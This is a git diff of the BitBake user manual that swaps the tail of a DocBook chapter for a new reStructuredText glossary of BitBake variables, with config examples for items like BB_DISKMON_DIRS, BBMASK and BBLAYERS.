- <link linkend='var-bb-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></link>:
- Specifies the name of the function to call during
- the "setscene" part of the task's execution in order
- to validate the list of task hashes.
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_SETSCENE_DEPVALID'><filename>BB_SETSCENE_DEPVALID</filename></link>:
- Specifies a function BitBake calls that determines
- whether BitBake requires a setscene dependency to
- be met.
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><filename>BB_SETSCENE_VERIFY_FUNCTION2</filename></link>:
- Specifies a function to call that verifies the list of
- planned task execution before the main task execution
- happens.
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_STAMP_POLICY'><filename>BB_STAMP_POLICY</filename></link>:
- Defines the mode for comparing timestamps of stamp files.
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_STAMP_WHITELIST'><filename>BB_STAMP_WHITELIST</filename></link>:
- Lists stamp files that are looked at when the stamp policy
- is "whitelist".
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_TASKHASH'><filename>BB_TASKHASH</filename></link>:
- Within an executing task, this variable holds the hash
- of the task as returned by the currently enabled
- signature generator.
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-STAMP'><filename>STAMP</filename></link>:
- The base path to create stamp files.
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-STAMPCLEAN'><filename>STAMPCLEAN</filename></link>:
- Again, the base path to create stamp files but can use wildcards
- for matching a range of files for clean operations.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='wildcard-support-in-variables'>
- <title>Wildcard Support in Variables</title>
-
- <para>
- Support for wildcard use in variables varies depending on the
- context in which it is used.
- For example, some variables and file names allow limited use of
- wildcards through the "<filename>%</filename>" and
- "<filename>*</filename>" characters.
- Other variables or names support Python's
- <ulink url='https://docs.python.org/3/library/glob.html'><filename>glob</filename></ulink>
- syntax,
- <ulink url='https://docs.python.org/3/library/fnmatch.html#module-fnmatch'><filename>fnmatch</filename></ulink>
- syntax, or
- <ulink url='https://docs.python.org/3/library/re.html#re'><filename>Regular Expression (re)</filename></ulink>
- syntax.
- </para>
-
- <para>
- For variables that have wildcard suport, the
- documentation describes which form of wildcard, its
- use, and its limitations.
- </para>
- </section>
-
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.rst
new file mode 100644
index 0000000000..74a3eb8095
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-ref-variables.rst
@@ -0,0 +1,1372 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+==================
+Variables Glossary
+==================
+
+|
+
+This chapter lists common variables used by BitBake and gives an
+overview of their function and contents.
+
+.. note::
+
+ Following are some points regarding the variables listed in this
+ glossary:
+
+ - The variables listed in this glossary are specific to BitBake.
+ Consequently, the descriptions are limited to that context.
+
+ - Also, variables exist in other systems that use BitBake (e.g. The
+ Yocto Project and OpenEmbedded) that have names identical to those
+ found in this glossary. For such cases, the variables in those
+ systems extend the functionality of the variable as it is
+ described here in this glossary.
+
+ - Finally, there are variables mentioned in this glossary that do
+ not appear in the BitBake glossary. These other variables are
+ variables used in systems that use BitBake.
+
+.. glossary::
+
+ :term:`ASSUME_PROVIDED`
+ Lists recipe names (:term:`PN` values) BitBake does not
+ attempt to build. Instead, BitBake assumes these recipes have already
+ been built.
+
+ In OpenEmbedded-Core, ``ASSUME_PROVIDED`` mostly specifies native
+ tools that should not be built. An example is ``git-native``, which
+ when specified allows for the Git binary from the host to be used
+ rather than building ``git-native``.
+
+ :term:`B`
+ The directory in which BitBake executes functions during a recipe's
+ build process.
+
+ :term:`BB_ALLOWED_NETWORKS`
+ Specifies a space-delimited list of hosts that the fetcher is allowed
+ to use to obtain the required source code. Following are
+ considerations surrounding this variable:
+
+ - This host list is only used if
+ :term:`BB_NO_NETWORK` is either not set or
+ set to "0".
+
+ - Limited support for the "``*``" wildcard character for matching
+ against the beginning of host names exists. For example, the
+ following setting matches ``git.gnu.org``, ``ftp.gnu.org``, and
+ ``foo.git.gnu.org``. ::
+
+ BB_ALLOWED_NETWORKS = "\*.gnu.org"
+
+ .. important::
+
+ The use of the "``*``" character only works at the beginning of
+ a host name and it must be isolated from the remainder of the
+ host name. You cannot use the wildcard character in any other
+ location of the name or combined with the front part of the
+ name.
+
+ For example, ``*.foo.bar`` is supported, while ``*aa.foo.bar``
+ is not.
+
+ - Mirrors not in the host list are skipped and logged in debug.
+
+ - Attempts to access networks not in the host list cause a failure.
+
+ Using ``BB_ALLOWED_NETWORKS`` in conjunction with
+ :term:`PREMIRRORS` is very useful. Adding the
+ host you want to use to ``PREMIRRORS`` results in the source code
+ being fetched from an allowed location and avoids raising an error
+ when a host that is not allowed is in a
+ :term:`SRC_URI` statement. This is because the
+ fetcher does not attempt to use the host listed in ``SRC_URI`` after
+ a successful fetch from the ``PREMIRRORS`` occurs.
+
+ :term:`BB_CONSOLELOG`
+ Specifies the path to a log file into which BitBake's user interface
+ writes output during the build.
+
+ :term:`BB_CURRENTTASK`
+ Contains the name of the currently running task. The name does not
+ include the ``do_`` prefix.
+
+ :term:`BB_DANGLINGAPPENDS_WARNONLY`
+ Defines how BitBake handles situations where an append file
+ (``.bbappend``) has no corresponding recipe file (``.bb``). This
+ condition often occurs when layers get out of sync (e.g. ``oe-core``
+ bumps a recipe version and the old recipe no longer exists and the
+ other layer has not been updated to the new version of the recipe
+ yet).
+
+ The default fatal behavior is safest because it is the sane reaction
+ given something is out of sync. It is important to realize when your
+ changes are no longer being applied.
+
+ :term:`BB_DEFAULT_TASK`
+ The default task to use when none is specified (e.g. with the ``-c``
+ command line option). The task name specified should not include the
+ ``do_`` prefix.
+
+ :term:`BB_DISKMON_DIRS`
+ Monitors disk space and available inodes during the build and allows
+ you to control the build based on these parameters.
+
+ Disk space monitoring is disabled by default. When setting this
+ variable, use the following form: ::
+
+ BB_DISKMON_DIRS = "<action>,<dir>,<threshold> [...]"
+
+ where:
+
+ <action> is:
+ ABORT: Immediately abort the build when
+ a threshold is broken.
+ STOPTASKS: Stop the build after the currently
+ executing tasks have finished when
+ a threshold is broken.
+ WARN: Issue a warning but continue the
+ build when a threshold is broken.
+ Subsequent warnings are issued as
+ defined by the
+ BB_DISKMON_WARNINTERVAL variable,
+ which must be defined.
+
+ <dir> is:
+ Any directory you choose. You can specify one or
+ more directories to monitor by separating the
+ groupings with a space. If two directories are
+ on the same device, only the first directory
+ is monitored.
+
+ <threshold> is:
+ Either the minimum available disk space,
+ the minimum number of free inodes, or
+ both. You must specify at least one. To
+ omit one or the other, simply omit the value.
+ Specify the threshold using G, M, K for Gbytes,
+ Mbytes, and Kbytes, respectively. If you do
+ not specify G, M, or K, Kbytes is assumed by
+ default. Do not use GB, MB, or KB.
+
+ Here are some examples: ::
+
+ BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
+ BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
+ BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
+
+ The first example works only if you also set the
+ :term:`BB_DISKMON_WARNINTERVAL`
+ variable. This example causes the build system to immediately abort
+ when either the disk space in ``${TMPDIR}`` drops below 1 Gbyte or
+ the available free inodes drops below 100 Kbytes. Because two
+ directories are provided with the variable, the build system also
+ issues a warning when the disk space in the ``${SSTATE_DIR}``
+ directory drops below 1 Gbyte or the number of free inodes drops
+ below 100 Kbytes. Subsequent warnings are issued during intervals as
+ defined by the ``BB_DISKMON_WARNINTERVAL`` variable.
+
+ The second example stops the build after all currently executing
+ tasks complete when the minimum disk space in the ``${TMPDIR}``
+ directory drops below 1 Gbyte. No disk monitoring occurs for the free
+ inodes in this case.
+
+ The final example immediately aborts the build when the number of
+ free inodes in the ``${TMPDIR}`` directory drops below 100 Kbytes. No
+ disk space monitoring for the directory itself occurs in this case.
+
+ :term:`BB_DISKMON_WARNINTERVAL`
+ Defines the disk space and free inode warning intervals.
+
+ If you are going to use the ``BB_DISKMON_WARNINTERVAL`` variable, you
+ must also use the :term:`BB_DISKMON_DIRS`
+ variable and define its action as "WARN". During the build,
+ subsequent warnings are issued each time disk space or number of free
+ inodes further reduces by the respective interval.
+
+ If you do not provide a ``BB_DISKMON_WARNINTERVAL`` variable and you
+ do use ``BB_DISKMON_DIRS`` with the "WARN" action, the disk
+ monitoring interval defaults to the following:
+ BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+ When specifying the variable in your configuration file, use the
+ following form: ::
+
+ BB_DISKMON_WARNINTERVAL = "<disk_space_interval>,<disk_inode_interval>"
+
+ where:
+
+ <disk_space_interval> is:
+ An interval of memory expressed in either
+ G, M, or K for Gbytes, Mbytes, or Kbytes,
+ respectively. You cannot use GB, MB, or KB.
+
+ <disk_inode_interval> is:
+ An interval of free inodes expressed in either
+ G, M, or K for Gbytes, Mbytes, or Kbytes,
+ respectively. You cannot use GB, MB, or KB.
+
+ Here is an example: ::
+
+ BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
+ BB_DISKMON_WARNINTERVAL = "50M,5K"
+
+ These variables cause BitBake to
+ issue subsequent warnings each time the available disk space further
+ reduces by 50 Mbytes or the number of free inodes further reduces by
+ 5 Kbytes in the ``${SSTATE_DIR}`` directory. Subsequent warnings
+ based on the interval occur each time a respective interval is
+ reached beyond the initial warning (i.e. 1 Gbytes and 100 Kbytes).
+
+ :term:`BB_ENV_WHITELIST`
+ Specifies the internal whitelist of variables to allow through from
+ the external environment into BitBake's datastore. If the value of
+ this variable is not specified (which is the default), the following
+ list is used: :term:`BBPATH`, :term:`BB_PRESERVE_ENV`,
+ :term:`BB_ENV_WHITELIST`, and :term:`BB_ENV_EXTRAWHITE`.
+
+ .. note::
+
+ You must set this variable in the external environment in order
+ for it to work.
+
+ :term:`BB_ENV_EXTRAWHITE`
+ Specifies an additional set of variables to allow through (whitelist)
+ from the external environment into BitBake's datastore. This list of
+ variables are on top of the internal list set in
+ :term:`BB_ENV_WHITELIST`.
+
+ .. note::
+
+ You must set this variable in the external environment in order
+ for it to work.
+
+ :term:`BB_FETCH_PREMIRRORONLY`
+ When set to "1", causes BitBake's fetcher module to only search
+ :term:`PREMIRRORS` for files. BitBake will not
+ search the main :term:`SRC_URI` or
+ :term:`MIRRORS`.
+
+ :term:`BB_FILENAME`
+ Contains the filename of the recipe that owns the currently running
+ task. For example, if the ``do_fetch`` task that resides in the
+ ``my-recipe.bb`` is executing, the ``BB_FILENAME`` variable contains
+ "/foo/path/my-recipe.bb".
+
+ :term:`BBFILES_DYNAMIC`
+ Activates content depending on presence of identified layers. You
+ identify the layers by the collections that the layers define.
+
+ Use the ``BBFILES_DYNAMIC`` variable to avoid ``.bbappend`` files whose
+ corresponding ``.bb`` file is in a layer that attempts to modify other
+ layers through ``.bbappend`` but does not want to introduce a hard
+ dependency on those other layers.
+
+ Additionally you can prefix the rule with "!" to add ``.bbappend`` and
+ ``.bb`` files in case a layer is not present. Use this avoid hard
+ dependency on those other layers.
+
+ Use the following form for ``BBFILES_DYNAMIC``: ::
+
+ collection_name:filename_pattern
+
+ The following example identifies two collection names and two filename
+ patterns: ::
+
+ BBFILES_DYNAMIC += "\
+ clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
+ core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
+ "
+
+ When the collection name is prefixed with "!" it will add the file pattern in case
+ the layer is absent: ::
+
+ BBFILES_DYNAMIC += "\
+ !clang-layer:${LAYERDIR}/backfill/meta-clang/*/*/*.bb \
+ "
+
+ This next example shows an error message that occurs because invalid
+ entries are found, which cause parsing to abort: ::
+
+ ERROR: BBFILES_DYNAMIC entries must be of the form {!}<collection name>:<filename pattern>, not:
+ /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
+ /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
+
+ :term:`BB_GENERATE_MIRROR_TARBALLS`
+ Causes tarballs of the Git repositories, including the Git metadata,
+ to be placed in the :term:`DL_DIR` directory. Anyone
+ wishing to create a source mirror would want to enable this variable.
+
+ For performance reasons, creating and placing tarballs of the Git
+ repositories is not the default action by BitBake. ::
+
+ BB_GENERATE_MIRROR_TARBALLS = "1"
+
+ :term:`BB_HASHCONFIG_WHITELIST`
+ Lists variables that are excluded from base configuration checksum,
+ which is used to determine if the cache can be reused.
+
+ One of the ways BitBake determines whether to re-parse the main
+ metadata is through checksums of the variables in the datastore of
+ the base configuration data. There are variables that you typically
+ want to exclude when checking whether or not to re-parse and thus
+ rebuild the cache. As an example, you would usually exclude ``TIME``
+ and ``DATE`` because these variables are always changing. If you did
+ not exclude them, BitBake would never reuse the cache.
+
+ :term:`BB_HASHBASE_WHITELIST`
+ Lists variables that are excluded from checksum and dependency data.
+ Variables that are excluded can therefore change without affecting
+ the checksum mechanism. A common example would be the variable for
+ the path of the build. BitBake's output should not (and usually does
+ not) depend on the directory in which it was built.
+
+ :term:`BB_HASHCHECK_FUNCTION`
+ Specifies the name of the function to call during the "setscene" part
+ of the task's execution in order to validate the list of task hashes.
+ The function returns the list of setscene tasks that should be
+ executed.
+
+ At this point in the execution of the code, the objective is to
+ quickly verify if a given setscene function is likely to work or not.
+ It's easier to check the list of setscene functions in one pass than
+ to call many individual tasks. The returned list need not be
+ completely accurate. A given setscene task can still later fail.
+ However, the more accurate the data returned, the more efficient the
+ build will be.
+
+ :term:`BB_INVALIDCONF`
+ Used in combination with the ``ConfigParsed`` event to trigger
+ re-parsing the base metadata (i.e. all the recipes). The
+ ``ConfigParsed`` event can set the variable to trigger the re-parse.
+ You must be careful to avoid recursive loops with this functionality.
+
+ :term:`BB_LOGCONFIG`
+ Specifies the name of a config file that contains the user logging
+ configuration. See
+ :ref:`bitbake-user-manual/bitbake-user-manual-execution:logging`
+ for additional information
+
+ :term:`BB_LOGFMT`
+ Specifies the name of the log files saved into
+ ``${``\ :term:`T`\ ``}``. By default, the ``BB_LOGFMT``
+ variable is undefined and the log file names get created using the
+ following form: ::
+
+ log.{task}.{pid}
+
+ If you want to force log files to take a specific name, you can set this
+ variable in a configuration file.
+
+ :term:`BB_NICE_LEVEL`
+ Allows BitBake to run at a specific priority (i.e. nice level).
+ System permissions usually mean that BitBake can reduce its priority
+ but not raise it again. See :term:`BB_TASK_NICE_LEVEL` for
+ additional information.
+
+ :term:`BB_NO_NETWORK`
+ Disables network access in the BitBake fetcher modules. With this
+ access disabled, any command that attempts to access the network
+ becomes an error.
+
+ Disabling network access is useful for testing source mirrors,
+ running builds when not connected to the Internet, and when operating
+ in certain kinds of firewall environments.
+
+ :term:`BB_NUMBER_THREADS`
+ The maximum number of tasks BitBake should run in parallel at any one
+ time. If your host development system supports multiple cores, a good
+ rule of thumb is to set this variable to twice the number of cores.
+
+ :term:`BB_NUMBER_PARSE_THREADS`
+ Sets the number of threads BitBake uses when parsing. By default, the
+ number of threads is equal to the number of cores on the system.
+
+ :term:`BB_ORIGENV`
+ Contains a copy of the original external environment in which BitBake
+ was run. The copy is taken before any whitelisted variable values are
+ filtered into BitBake's datastore.
+
+ .. note::
+
+ The contents of this variable is a datastore object that can be
+ queried using the normal datastore operations.
+
+ :term:`BB_PRESERVE_ENV`
+ Disables whitelisting and instead allows all variables through from
+ the external environment into BitBake's datastore.
+
+ .. note::
+
+ You must set this variable in the external environment in order
+ for it to work.
+
+ :term:`BB_RUNFMT`
+ Specifies the name of the executable script files (i.e. run files)
+ saved into ``${``\ :term:`T`\ ``}``. By default, the
+ ``BB_RUNFMT`` variable is undefined and the run file names get
+ created using the following form: ::
+
+ run.{task}.{pid}
+
+ If you want to force run files to take a specific name, you can set this
+ variable in a configuration file.
+
+ :term:`BB_RUNTASK`
+ Contains the name of the currently executing task. The value includes
+ the "do\_" prefix. For example, if the currently executing task is
+ ``do_config``, the value is "do_config".
+
+ :term:`BB_SCHEDULER`
+ Selects the name of the scheduler to use for the scheduling of
+ BitBake tasks. Three options exist:
+
+ - *basic* - The basic framework from which everything derives. Using
+ this option causes tasks to be ordered numerically as they are
+ parsed.
+
+ - *speed* - Executes tasks first that have more tasks depending on
+ them. The "speed" option is the default.
+
+ - *completion* - Causes the scheduler to try to complete a given
+ recipe once its build has started.
+
+ :term:`BB_SCHEDULERS`
+ Defines custom schedulers to import. Custom schedulers need to be
+ derived from the ``RunQueueScheduler`` class.
+
+ For information how to select a scheduler, see the
+ :term:`BB_SCHEDULER` variable.
+
+ :term:`BB_SETSCENE_DEPVALID`
+ Specifies a function BitBake calls that determines whether BitBake
+ requires a setscene dependency to be met.
+
+ When running a setscene task, BitBake needs to know which
+ dependencies of that setscene task also need to be run. Whether
+ dependencies also need to be run is highly dependent on the metadata.
+ The function specified by this variable returns a "True" or "False"
+ depending on whether the dependency needs to be met.
+
+ :term:`BB_SETSCENE_VERIFY_FUNCTION2`
+ Specifies a function to call that verifies the list of planned task
+ execution before the main task execution happens. The function is
+ called once BitBake has a list of setscene tasks that have run and
+ either succeeded or failed.
+
+ The function allows for a task list check to see if they make sense.
+ Even if BitBake was planning to skip a task, the returned value of
+ the function can force BitBake to run the task, which is necessary
+ under certain metadata defined circumstances.
+
+ :term:`BB_SIGNATURE_EXCLUDE_FLAGS`
+ Lists variable flags (varflags) that can be safely excluded from
+ checksum and dependency data for keys in the datastore. When
+ generating checksum or dependency data for keys in the datastore, the
+ flags set against that key are normally included in the checksum.
+
+ For more information on varflags, see the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flags`"
+ section.
+
+ :term:`BB_SIGNATURE_HANDLER`
+ Defines the name of the signature handler BitBake uses. The signature
+ handler defines the way stamp files are created and handled, if and
+ how the signature is incorporated into the stamps, and how the
+ signature itself is generated.
+
+ A new signature handler can be added by injecting a class derived
+ from the ``SignatureGenerator`` class into the global namespace.
+
+ :term:`BB_SRCREV_POLICY`
+ Defines the behavior of the fetcher when it interacts with source
+ control systems and dynamic source revisions. The
+ ``BB_SRCREV_POLICY`` variable is useful when working without a
+ network.
+
+ The variable can be set using one of two policies:
+
+ - *cache* - Retains the value the system obtained previously rather
+ than querying the source control system each time.
+
+ - *clear* - Queries the source controls system every time. With this
+ policy, there is no cache. The "clear" policy is the default.
+
+ :term:`BB_STAMP_POLICY`
+ Defines the mode used for how timestamps of stamp files are compared.
+ You can set the variable to one of the following modes:
+
+ - *perfile* - Timestamp comparisons are only made between timestamps
+ of a specific recipe. This is the default mode.
+
+ - *full* - Timestamp comparisons are made for all dependencies.
+
+ - *whitelist* - Identical to "full" mode except timestamp
+ comparisons are made for recipes listed in the
+ :term:`BB_STAMP_WHITELIST` variable.
+
+ .. note::
+
+ Stamp policies are largely obsolete with the introduction of
+ setscene tasks.
+
+ :term:`BB_STAMP_WHITELIST`
+ Lists files whose stamp file timestamps are compared when the stamp
+ policy mode is set to "whitelist". For information on stamp policies,
+ see the :term:`BB_STAMP_POLICY` variable.
+
+ :term:`BB_STRICT_CHECKSUM`
+ Sets a more strict checksum mechanism for non-local URLs. Setting
+ this variable to a value causes BitBake to report an error if it
+ encounters a non-local URL that does not have at least one checksum
+ specified.
+
+ :term:`BB_TASK_IONICE_LEVEL`
+ Allows adjustment of a task's Input/Output priority. During
+ Autobuilder testing, random failures can occur for tasks due to I/O
+ starvation. These failures occur during various QEMU runtime
+ timeouts. You can use the ``BB_TASK_IONICE_LEVEL`` variable to adjust
+ the I/O priority of these tasks.
+
+ .. note::
+
+ This variable works similarly to the :term:`BB_TASK_NICE_LEVEL`
+ variable except with a task's I/O priorities.
+
+ Set the variable as follows: ::
+
+ BB_TASK_IONICE_LEVEL = "class.prio"
+
+ For *class*, the default value is "2", which is a best effort. You can use
+ "1" for realtime and "3" for idle. If you want to use realtime, you
+ must have superuser privileges.
+
+ For *prio*, you can use any value from "0", which is the highest
+ priority, to "7", which is the lowest. The default value is "4". You
+ do not need any special privileges to use this range of priority
+ values.
+
+ .. note::
+
+ In order for your I/O priority settings to take effect, you need the
+ Completely Fair Queuing (CFQ) Scheduler selected for the backing block
+ device. To select the scheduler, use the following command form where
+ device is the device (e.g. sda, sdb, and so forth): ::
+
+ $ sudo sh -c "echo cfq > /sys/block/device/queu/scheduler"
+
+ :term:`BB_TASK_NICE_LEVEL`
+ Allows specific tasks to change their priority (i.e. nice level).
+
+ You can use this variable in combination with task overrides to raise
+ or lower priorities of specific tasks. For example, on the `Yocto
+ Project <http://www.yoctoproject.org>`__ autobuilder, QEMU emulation
+ in images is given a higher priority as compared to build tasks to
+ ensure that images do not suffer timeouts on loaded systems.
+
+ :term:`BB_TASKHASH`
+ Within an executing task, this variable holds the hash of the task as
+ returned by the currently enabled signature generator.
+
+ :term:`BB_VERBOSE_LOGS`
+ Controls how verbose BitBake is during builds. If set, shell scripts
+ echo commands and shell script output appears on standard out
+ (stdout).
+
+ :term:`BB_WORKERCONTEXT`
+ Specifies if the current context is executing a task. BitBake sets
+ this variable to "1" when a task is being executed. The value is not
+ set when the task is in server context during parsing or event
+ handling.
+
+ :term:`BBCLASSEXTEND`
+ Allows you to extend a recipe so that it builds variants of the
+ software. Some examples of these variants for recipes from the
+ OpenEmbedded-Core metadata are "natives" such as ``quilt-native``,
+ which is a copy of Quilt built to run on the build system; "crosses"
+ such as ``gcc-cross``, which is a compiler built to run on the build
+ machine but produces binaries that run on the target ``MACHINE``;
+ "nativesdk", which targets the SDK machine instead of ``MACHINE``;
+ and "mulitlibs" in the form "``multilib:``\ multilib_name".
+
+ To build a different variant of the recipe with a minimal amount of
+ code, it usually is as simple as adding the variable to your recipe.
+ Here are two examples. The "native" variants are from the
+ OpenEmbedded-Core metadata: ::
+
+ BBCLASSEXTEND =+ "native nativesdk"
+ BBCLASSEXTEND =+ "multilib:multilib_name"
+
+ .. note::
+
+ Internally, the ``BBCLASSEXTEND`` mechanism generates recipe
+ variants by rewriting variable values and applying overrides such
+ as ``_class-native``. For example, to generate a native version of
+ a recipe, a :term:`DEPENDS` on "foo" is
+ rewritten to a ``DEPENDS`` on "foo-native".
+
+ Even when using ``BBCLASSEXTEND``, the recipe is only parsed once.
+ Parsing once adds some limitations. For example, it is not
+ possible to include a different file depending on the variant,
+ since ``include`` statements are processed when the recipe is
+ parsed.
+
+ :term:`BBDEBUG`
+ Sets the BitBake debug output level to a specific value as
+ incremented by the ``-D`` command line option.
+
+ .. note::
+
+ You must set this variable in the external environment in order
+ for it to work.
+
+ :term:`BBFILE_COLLECTIONS`
+ Lists the names of configured layers. These names are used to find
+ the other ``BBFILE_*`` variables. Typically, each layer appends its
+ name to this variable in its ``conf/layer.conf`` file.
+
+ :term:`BBFILE_PATTERN`
+ Variable that expands to match files from
+ :term:`BBFILES` in a particular layer. This
+ variable is used in the ``conf/layer.conf`` file and must be suffixed
+ with the name of the specific layer (e.g.
+ ``BBFILE_PATTERN_emenlow``).
+
+ :term:`BBFILE_PRIORITY`
+ Assigns the priority for recipe files in each layer.
+
+ This variable is useful in situations where the same recipe appears
+ in more than one layer. Setting this variable allows you to
+ prioritize a layer against other layers that contain the same recipe
+ - effectively letting you control the precedence for the multiple
+ layers. The precedence established through this variable stands
+ regardless of a recipe's version (:term:`PV` variable).
+ For example, a layer that has a recipe with a higher ``PV`` value but
+ for which the ``BBFILE_PRIORITY`` is set to have a lower precedence
+ still has a lower precedence.
+
+ A larger value for the ``BBFILE_PRIORITY`` variable results in a
+ higher precedence. For example, the value 6 has a higher precedence
+ than the value 5. If not specified, the ``BBFILE_PRIORITY`` variable
+ is set based on layer dependencies (see the ``LAYERDEPENDS`` variable
+ for more information. The default priority, if unspecified for a
+ layer with no dependencies, is the lowest defined priority + 1 (or 1
+ if no priorities are defined).
+
+ .. tip::
+
+ You can use the command bitbake-layers show-layers to list all
+ configured layers along with their priorities.
+
+ :term:`BBFILES`
+ A space-separated list of recipe files BitBake uses to build
+ software.
+
+ When specifying recipe files, you can pattern match using Python's
+ `glob <https://docs.python.org/3/library/glob.html>`_ syntax.
+ For details on the syntax, see the documentation by following the
+ previous link.
+
+ :term:`BBINCLUDED`
+ Contains a space-separated list of all of all files that BitBake's
+ parser included during parsing of the current file.
+
+ :term:`BBINCLUDELOGS`
+ If set to a value, enables printing the task log when reporting a
+ failed task.
+
+ :term:`BBINCLUDELOGS_LINES`
+ If :term:`BBINCLUDELOGS` is set, specifies
+ the maximum number of lines from the task log file to print when
+ reporting a failed task. If you do not set ``BBINCLUDELOGS_LINES``,
+ the entire log is printed.
+
+ :term:`BBLAYERS`
+ Lists the layers to enable during the build. This variable is defined
+ in the ``bblayers.conf`` configuration file in the build directory.
+ Here is an example: ::
+
+ BBLAYERS = " \
+ /home/scottrif/poky/meta \
+ /home/scottrif/poky/meta-yocto \
+ /home/scottrif/poky/meta-yocto-bsp \
+ /home/scottrif/poky/meta-mykernel \
+ "
+
+ This example enables four layers, one of which is a custom, user-defined
+ layer named ``meta-mykernel``.
+
+ :term:`BBLAYERS_FETCH_DIR`
+ Sets the base location where layers are stored. This setting is used
+ in conjunction with ``bitbake-layers layerindex-fetch`` and tells
+ ``bitbake-layers`` where to place the fetched layers.
+
+ :term:`BBMASK`
+ Prevents BitBake from processing recipes and recipe append files.
+
+ You can use the ``BBMASK`` variable to "hide" these ``.bb`` and
+ ``.bbappend`` files. BitBake ignores any recipe or recipe append
+ files that match any of the expressions. It is as if BitBake does not
+ see them at all. Consequently, matching files are not parsed or
+ otherwise used by BitBake.
+
+ The values you provide are passed to Python's regular expression
+ compiler. Consequently, the syntax follows Python's Regular
+ Expression (re) syntax. The expressions are compared against the full
+ paths to the files. For complete syntax information, see Python's
+ documentation at http://docs.python.org/3/library/re.html.
+
+ The following example uses a complete regular expression to tell
+ BitBake to ignore all recipe and recipe append files in the
+ ``meta-ti/recipes-misc/`` directory: ::
+
+ BBMASK = "meta-ti/recipes-misc/"
+
+ If you want to mask out multiple directories or recipes, you can
+ specify multiple regular expression fragments. This next example
+ masks out multiple directories and individual recipes: ::
+
+ BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
+ BBMASK += "/meta-oe/recipes-support/"
+ BBMASK += "/meta-foo/.*/openldap"
+ BBMASK += "opencv.*\.bbappend"
+ BBMASK += "lzma"
+
+ .. note::
+
+ When specifying a directory name, use the trailing slash character
+ to ensure you match just that directory name.
+
+ :term:`BBMULTICONFIG`
+ Enables BitBake to perform multiple configuration builds and lists
+ each separate configuration (multiconfig). You can use this variable
+ to cause BitBake to build multiple targets where each target has a
+ separate configuration. Define ``BBMULTICONFIG`` in your
+ ``conf/local.conf`` configuration file.
+
+ As an example, the following line specifies three multiconfigs, each
+ having a separate configuration file: ::
+
+ BBMULTIFONFIG = "configA configB configC"
+
+ Each configuration file you use must reside in the
+ build directory within a directory named ``conf/multiconfig`` (e.g.
+ build_directory\ ``/conf/multiconfig/configA.conf``).
+
+ For information on how to use ``BBMULTICONFIG`` in an environment
+ that supports building targets with multiple configurations, see the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-intro:executing a multiple configuration build`"
+ section.
+
+ :term:`BBPATH`
+ Used by BitBake to locate class (``.bbclass``) and configuration
+ (``.conf``) files. This variable is analogous to the ``PATH``
+ variable.
+
+ If you run BitBake from a directory outside of the build directory,
+ you must be sure to set ``BBPATH`` to point to the build directory.
+ Set the variable as you would any environment variable and then run
+ BitBake: ::
+
+ $ BBPATH="build_directory"
+ $ export BBPATH
+ $ bitbake target
+
+ :term:`BBSERVER`
+ Points to the server that runs memory-resident BitBake. The variable
+ is only used when you employ memory-resident BitBake.
+
+ :term:`BBTARGETS`
+ Allows you to use a configuration file to add to the list of
+ command-line target recipes you want to build.
+
+ :term:`BBVERSIONS`
+ Allows a single recipe to build multiple versions of a project from a
+ single recipe file. You also able to specify conditional metadata
+ using the :term:`OVERRIDES` mechanism for a
+ single version or for an optionally named range of versions.
+
+ For more information on ``BBVERSIONS``, see the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variants - class extension mechanism`"
+ section.
+
+ :term:`BITBAKE_UI`
+ Used to specify the UI module to use when running BitBake. Using this
+ variable is equivalent to using the ``-u`` command-line option.
+
+ .. note::
+
+ You must set this variable in the external environment in order
+ for it to work.
+
+ :term:`BUILDNAME`
+ A name assigned to the build. The name defaults to a datetime stamp
+ of when the build was started but can be defined by the metadata.
+
+ :term:`BZRDIR`
+ The directory in which files checked out of a Bazaar system are
+ stored.
+
+ :term:`CACHE`
+ Specifies the directory BitBake uses to store a cache of the metadata
+ so it does not need to be parsed every time BitBake is started.
+
+ :term:`CVSDIR`
+ The directory in which files checked out under the CVS system are
+ stored.
+
+ :term:`DEFAULT_PREFERENCE`
+ Specifies a weak bias for recipe selection priority.
+
+ The most common usage of this is variable is to set it to "-1" within
+ a recipe for a development version of a piece of software. Using the
+ variable in this way causes the stable version of the recipe to build
+ by default in the absence of ``PREFERRED_VERSION`` being used to
+ build the development version.
+
+ .. note::
+
+ The bias provided by DEFAULT_PREFERENCE is weak and is overridden by
+ :term:`BBFILE_PRIORITY` if that variable is different between two
+ layers that contain different versions of the same recipe.
+
+ :term:`DEPENDS`
+ Lists a recipe's build-time dependencies (i.e. other recipe files).
+
+ Consider this simple example for two recipes named "a" and "b" that
+ produce similarly named packages. In this example, the ``DEPENDS``
+ statement appears in the "a" recipe: ::
+
+ DEPENDS = "b"
+
+ Here, the dependency is such that the ``do_configure`` task for recipe "a"
+ depends on the ``do_populate_sysroot`` task of recipe "b". This means
+ anything that recipe "b" puts into sysroot is available when recipe "a" is
+ configuring itself.
+
